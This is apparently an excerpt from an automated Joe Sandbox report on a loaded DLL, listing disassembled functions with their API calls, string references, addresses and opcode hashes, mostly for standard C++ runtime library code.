Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
Instruction ID: 8688bbfb5126637dbdccf3455e9659dd8b3f6ee28c6a2945f365496b19e5a522
Opcode Fuzzy Hash: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
Instruction Fuzzy Hash: F1110A75D1052DCBCF01EBE0C894AEEB77BAF45B14F240904D4106B2D0DB749A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F422
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F42C
int.LIBCPMT ref: 6E20F443

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F4BB

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
Instruction ID: a5d1dd125845e15b005faedafa4bb64f4ef57cd44b46559f3334f0af271d1c59
Opcode Fuzzy Hash: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
Instruction Fuzzy Hash: 4411E375A1051E9BCF00EBE0CC94AEEB77BBF44B25F240918E9116B2D0DFB49A44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20A252
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A25C
int.LIBCPMT ref: 6E20A273

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20A2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A2EB

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
Instruction ID: 636a2fded1faa2f8d9604b56e602cb01600b6586baba97773650e95b435a012b
Opcode Fuzzy Hash: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
Instruction Fuzzy Hash: D31106B5A0052E8FCF00DBE4C898AEDB77BBF54714F140918E4116B2D0DF749A44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F2E0
int.LIBCPMT ref: 6E20F2F7

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F331
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F351
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F36F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
Instruction ID: 10625688a95a7fcfc8cc82e3f48675f4d5747b483601fc92543ebc04cc0c7c02
Opcode Fuzzy Hash: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
Instruction Fuzzy Hash: A911E37591055D8FCF00DBE0C894AEEB77BBF44B19F240909E420AB2D0DFB4AA80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20A1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A1B6
int.LIBCPMT ref: 6E20A1CD

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20A207
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A227
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A245

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
Instruction ID: 6e44de99da2cb1ebe52b4e5df4bd36382c4cfab6883d3680bdc0eca246e7b81f
Opcode Fuzzy Hash: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
Instruction Fuzzy Hash: 8311E3B690051E9FCF00EBE4C898AEDB77BAF44714F540919E4106B2D0DFB89A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E2046AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E2046B2
std::_Lockit::_Lockit.LIBCPMT ref: 6E2046BC
int.LIBCPMT ref: 6E2046D3

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E204723
__CxxThrowException@8.LIBVCRUNTIME ref: 6E204741

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
Instruction ID: 325578467af4ab80f22256d81193297801e9c7faf2b1cfb461339df5bedec8d4
Opcode Fuzzy Hash: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
Instruction Fuzzy Hash: C211047AE0052E9FCB01DBE0C854AEDB77BBF55715F104A08E510AB2D0EBB49A45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D5FF, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
_free.LIBCMT ref: 6E24D636
_free.LIBCMT ref: 6E24D65E
SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D66B
SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
_abort.LIBCMT ref: 6E24D67D

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 12252f4bc2cc4df6d16230366899141a278cc82689004c76eb79c503cdacdbfd
Instruction ID: 9a7cd09454368dbab1051a50c8191e7456ad7ac45acccf8267cc2d1e10e6fa86
Opcode Fuzzy Hash: 12252f4bc2cc4df6d16230366899141a278cc82689004c76eb79c503cdacdbfd
Instruction Fuzzy Hash: BBF0493904490DE7C78926F9EC0DF8A233F8BC2A66B244911F428D7184EFB488028874

Uniqueness

Uniqueness Score: -1.00%

Function 6E2075E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E2075F4

Part of subcall function 6E2073A9: std::exception::exception.LIBCONCRT ref: 6E2073B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6E207602

Part of subcall function 6E223D74: RaiseException.KERNEL32(00000000,?,u n,00000000,?,?,?,?,?,?,?,6E2075E7,00000000,6E2C14C0,?), ref: 6E223DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E207614

Part of subcall function 6E2073E3: std::exception::exception.LIBCONCRT ref: 6E2073F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6E207622
std::regex_error::regex_error.LIBCPMT ref: 6E207634

Part of subcall function 6E207426: std::exception::exception.LIBCONCRT ref: 6E20743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6E207642

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
Instruction ID: bc20243a92160734bc8aa5ec56accde5d901f2cb113101ed41dab999bf1482eb
Opcode Fuzzy Hash: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
Instruction Fuzzy Hash: 44F0FE39C0010D7BCB05FBE4DC49CDDB77EAA14544F804A20AA1496591EB71A659C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FF218, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(6E2C86A0,0000305A,00000040,6E2C869C,?,00000000,7C6994D4,008B1A54,?), ref: 6E1FF2D5

Strings

Y,n, xrefs: 6E1FF239
DZ,n, xrefs: 6E1FF498
DZ,n, xrefs: 6E1FF27D
Y,n, xrefs: 6E1FF385

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZ,n$DZ,n$Y,n$Y,n
API String ID: 544645111-1993951851
Opcode ID: 46191d3b3ee2bc91f63fa3108c7ad4bae8af179177f879adf0169edaf738d5d9
Instruction ID: a5b7f911b7033b785ff07591207ce564b1f756772ad12d5d4be07b5ac90ca138
Opcode Fuzzy Hash: 46191d3b3ee2bc91f63fa3108c7ad4bae8af179177f879adf0169edaf738d5d9
Instruction Fuzzy Hash: AC8123719415518FCF88CF6AC88D6BC7BF6BB59B10B24815BE441D7380E378E581CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E2053EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6E2053F5
__Getcvt.LIBCPMT ref: 6E20540B
__Getcvt.LIBCPMT ref: 6E205445

Strings

false, xrefs: 6E205466
true, xrefs: 6E20547B

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
Instruction ID: 7531bd0d55aa755e4efd8bfd98f7d9ad7d5b170f848d142ec67f51e9ce84f4e5
Opcode Fuzzy Hash: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
Instruction Fuzzy Hash: E7216DB6D0121CAFDB11CFE5C884ADEBBB9BF05710F04446AE9049F640EB709A95CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E24972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E249742
FreeLibrary.KERNEL32(00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E249765

Strings

CorExitProcess, xrefs: 6E24973A
mscoree.dll, xrefs: 6E249728

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
Instruction ID: 11d5c449a251d1c9f717f503511100945b597d2cf1bf1fc52f41c0e5bb53406a
Opcode Fuzzy Hash: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
Instruction Fuzzy Hash: B1F0AF7090052EFBDF419F90C958FAEBFBAEF05712F0081A8A905A6240DB319A40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E254E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff7e6b42445d244d725beb47306ff76b229cee0c96ee1837fb5ad38148bb758
Instruction ID: 52c41d5498e631e222ba9415a4411c17bf8912b07e00d30bfb53408d903723fb
Opcode Fuzzy Hash: cff7e6b42445d244d725beb47306ff76b229cee0c96ee1837fb5ad38148bb758
Instruction Fuzzy Hash: 7471D23195031F9BDB518BD9CA44AAFBB76EF49311F144629E82167380C7B18866CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24A737, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6E24A7A9
_free.LIBCMT ref: 6E24A7C9

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 93a1171403b985d84c24c764a6c40519fbad89df573776ca03f0932c9853bc36
Instruction ID: 3f7f4bc7bcf24339a14b48fcccea091df010d716c30d5fa0513ad6727c82625c
Opcode Fuzzy Hash: 93a1171403b985d84c24c764a6c40519fbad89df573776ca03f0932c9853bc36
Instruction Fuzzy Hash: 9541A276E40208DFDB14CFA8C885A9EB7F6EF89714B254569D915EB241E731E902CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D683, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(6E2075D9,6E2075D9,00000002,6E242286,6E24F2B0,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004), ref: 6E24D688
_free.LIBCMT ref: 6E24D6BD
_free.LIBCMT ref: 6E24D6E4
SetLastError.KERNEL32(00000000,?,6E2075D9), ref: 6E24D6F1
SetLastError.KERNEL32(00000000,?,6E2075D9), ref: 6E24D6FA

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 614b117d0bd6845f7f2d5800514683df6bf4c0565f122ed309d2bea76e8e9b59
Instruction ID: 9d6dd68942a56b49741f1a5482711501c10d2b951223f683445f59e11dc200fb
Opcode Fuzzy Hash: 614b117d0bd6845f7f2d5800514683df6bf4c0565f122ed309d2bea76e8e9b59
Instruction Fuzzy Hash: C001FE7A18490AEBD34916F9EC4DE5B273F9BC37767244525F41D96240EFF488018974

Uniqueness

Uniqueness Score: -1.00%

Function 6E25CCC3, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6E25CCDB

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E25CCED
_free.LIBCMT ref: 6E25CCFF
_free.LIBCMT ref: 6E25CD11
_free.LIBCMT ref: 6E25CD23

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 685797e0a0a6de1c9222722fa9164a7faec82c90f1716fc1e6bcddce8dfa7dd2
Instruction ID: e23053e84b8e6bb67568be27089eec695c5d5f401943e04cc8de466a4227d7f5
Opcode Fuzzy Hash: 685797e0a0a6de1c9222722fa9164a7faec82c90f1716fc1e6bcddce8dfa7dd2
Instruction Fuzzy Hash: 50F04435441A0ED7CA94CBD8E5CAC5B37EFBA09E117704C05E065EF601E774F8948AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E247D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 6E247F3C
__freea.LIBCMT ref: 6E247F5A

Strings

a/p, xrefs: 6E248021
am/pm, xrefs: 6E247FBD

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 90cf7f880e14f1461c14eac5975b9102c4f30f38b81578da70377dc4b63c13b2
Instruction ID: 62c3d0ebb481481a39a7dda47ff20ff33918b03a5916278e0e20b5e2f99a19c4
Opcode Fuzzy Hash: 90cf7f880e14f1461c14eac5975b9102c4f30f38b81578da70377dc4b63c13b2
Instruction Fuzzy Hash: DFD1D37593424FDBDB4D8FE8C850BAAB7B2FF06301F14455AE928AB284E3759940CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6E20426E
_wcslen.LIBCMT ref: 6E204281

Strings

For, xrefs: 6E204273, 6E204349
`k,n, xrefs: 6E2042C8

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`k,n
API String ID: 1260878687-1763375410
Opcode ID: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
Instruction ID: 67532f0e83a35c3b0ebb2299c210994367130e8a5225051f6bfa046bdc138d45
Opcode Fuzzy Hash: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
Instruction Fuzzy Hash: A6419C79A2021E8FCB40DBE8C5D49ACB7B3BF9AB14B208245E551BB3D1C670E842C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E258AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6E258B1F
